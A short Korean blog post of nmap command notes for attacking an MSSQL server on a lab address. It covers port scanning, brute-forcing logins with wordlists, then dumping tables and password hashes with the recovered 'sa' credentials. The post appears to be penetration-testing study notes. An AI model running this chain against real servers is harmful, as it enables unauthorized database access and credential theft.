* nmap -Pn 192.168.1.3
-> 1433 port, SQL 살아 있는 것을 확인
* nmap -p1433 --script ms-sql-info 192.168.1.3
-> SQL 정보 확인
* nmap -p1433 --script ms-sql-brute 192.168.1.3
-> 기본적인 내용으로 id/pw 공격
* nmap -p1433 --script ms-sql-brute --script-args userdb=/root/Destop/user.txt,passdb=/usr/share/wordlist/fasttrack.txt 192.168.1.3
-> custom id/pw 입력해서 공격
* nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa,password=a12345 192.168.1.3
-> 찾아낸 ID/PW로 테이블 내용 가져오기
* nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,password=a12345 192.168.1.3
-> 찾아낸 ID/PW로 Database password 해쉬값 가져오기
'보안 > 도구' 카테고리의 다른 글
[도구] ADB 명령어 정리 내용 ( am/pm/capture/mongkey 등 ) (0) | 2018.03.19 |
---|---|
공유 게시판 이더패드 (0) | 2015.03.30 |
[Security] Fillder Menual / UseCase (0) | 2014.02.27 |
unix util commands (0) | 2013.12.10 |
putty connection manager (0) | 2013.10.07 |